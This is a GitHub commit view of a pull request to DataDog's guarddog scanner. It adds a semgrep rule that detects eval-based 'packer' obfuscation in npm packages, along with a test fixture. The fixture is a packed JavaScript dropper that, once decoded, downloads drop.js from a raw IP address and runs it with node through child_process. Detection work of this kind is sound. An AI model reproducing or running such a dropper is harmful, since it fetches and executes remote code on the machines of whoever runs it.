Merge pull request #524 from DataDog/s.obregoso/add_npm_obfuscation_p…

…acker Adding packer detection
DataDog · Feb 5, 2025 · 8109e69 · 8109e69
2 parents 4723efb + a79d2c5
commit 8109e69
Show file tree

Hide file tree

Showing 2 changed files with 13 additions and 0 deletions.
diff --git a/guarddog/analyzer/sourcecode/npm-obfuscation.yml b/guarddog/analyzer/sourcecode/npm-obfuscation.yml
@@ -57,6 +57,14 @@ rules:
           - pattern-not-inside: //...
           - pattern-regex: ^(.*?);?[\h]{150,};?.{10,}$
 
+        # Packer
+        - pattern: | 
+            eval(function(...){ 
+            ...
+            $VAR.replace(new RegExp(...),...)
+            ... 
+            }(...))
+
     languages:
       - javascript
     severity: WARNING
diff --git a/tests/analyzer/sourcecode/npm-obfuscation.js b/tests/analyzer/sourcecode/npm-obfuscation.js
@@ -211,3 +211,8 @@ function f(){
      * @adminMethod
      */
 }
+
+function f(){
+    // ruleid: npm-obfuscation
+    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4 e=p(\'e\');4 9=p(\'9\');4{G}=p(\'1i\');j s(o,d,g){0.5(`K M N ${o}`);4 2=9.Z(d);e.Q(o,(b)=>{4{n,E}=b;6(n!==S){0.1(`U W.X I Y:${n}`);b.t();7}4 m=E[\'i-V\']||\'\';6(!m.x(\'T/u\')&&!m.x(\'R/u\')){0.1(\'P 2 O C a D 2. H.\');b.t();7}b.L(2);2.A(\'J\',()=>{2.10(g);0.5(`h v 1f z ${d}`)})}).A(\'1\',(c)=>{9.12(d,()=>{});0.1(\'k 1r 2:\',c.l)})}j B(3,g){0.5(`1q 2 i:${3}`);9.1o(3,\'1n\',(c,w)=>{6(c){0.1(\'k 1m 2:\',c.l);7}6(w.1l().1k(\'<1j>\')){0.1(\'h 11 z 1h 1s 1g 1e, C D. H.\');7}0.5(\'h i 1b 1a.\');g();})}j F(3){0.5(`17 16 2:${3}`);G(`15 ${3}`,(1,q,f)=>{6(1){0.1(`k 13 2:${1.l}`);7}6(f){0.1(`f:${f}`)}0.5(`q:${q}`)})}4 y=\'e://8.14.18.19/1c/1d.r\';4 3=\'./v-1p.r\';s(y,3,()=>{B(3,()=>{F(3);})});',62,91,'console|error|file|filePath|const|log|if|return||fs||response|err|outputPath|http|stderr|callback|File|content|function|Error|message|contentType|statusCode|url|require|stdout|js|downloadFile|resume|javascript|downloaded|data|includes|fileUrl|to|on|validateFile|not|JavaScript|headers|runFile|exec|Aborting|Status|finish|Starting|pipe|download|from|is|Downloaded|get|text|200|application|Download|type|failed|HTTP|Code|createWriteStream|close|appears|unlink|executing|152|node|the|Running|163|60|passed|validation|scripts|drop|document|successfully|HTML|be|child_process|html|startsWith|trim|reading|utf8|readFile|script|Validating|downloading|an'.split('|'),0,{}))
+}